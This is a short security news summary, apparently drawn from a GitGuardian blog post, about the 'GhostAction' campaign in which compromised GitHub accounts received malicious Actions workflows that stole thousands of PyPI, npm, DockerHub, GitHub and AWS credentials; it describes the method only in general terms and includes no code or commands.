https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen
Security researchers at GitGuardian have uncovered a massive supply chain attack dubbed “GhostAction” that compromised 327 GitHub users across 817 repositories, resulting in the theft of 3,325 sensitive credentials including PyPI, npm, DockerHub tokens, GitHub access keys, and AWS credentials. The campaign, discovered on 5th September 2025, represents one of the largest GitHub-focused supply chain attacks to date, with attackers exploiting GitHub Actions workflows to systematically exfiltrate secrets through malicious HTTP POST requests to remote endpoints controlled by the threat actors.
The attack methodology involved compromising developer accounts and injecting malicious GitHub Actions workflows that were designed to enumerate and extract secrets from legitimate workflow files within targeted repositories. The attackers demonstrated sophisticated reconnaissance capabilities by analysing existing workflow configurations to identify which secrets were in use, then hardcoding those same secret names into their malicious workflows to ensure successful exfiltration. The campaign affected projects across multiple programming languages including Python, JavaScript, Rust, and Go repositories, with DockerHub credentials, GitHub tokens, and npm tokens representing the most commonly stolen secret types.
The GhostAction attack began manifesting publicly on 2nd September 2025, when a GitHub user identified as “Grommash9” committed a malicious workflow file labeled “Github Actions Security” to the FastUUID project, marking the start of what would become a coordinated assault on hundreds of repositories. While investigators found no evidence of malicious package releases during the compromise period despite the theft of PyPI tokens, the stolen npm and PyPI credentials could still potentially be used to publish malicious packages to software repositories, creating ongoing supply chain risks. The incident highlights critical vulnerabilities in DevOps security practices and the increasing sophistication of attacks targeting developer infrastructure, with the stolen credentials potentially providing attackers with access to cloud services, package registries, and private repositories across numerous organisations and projects worldwide.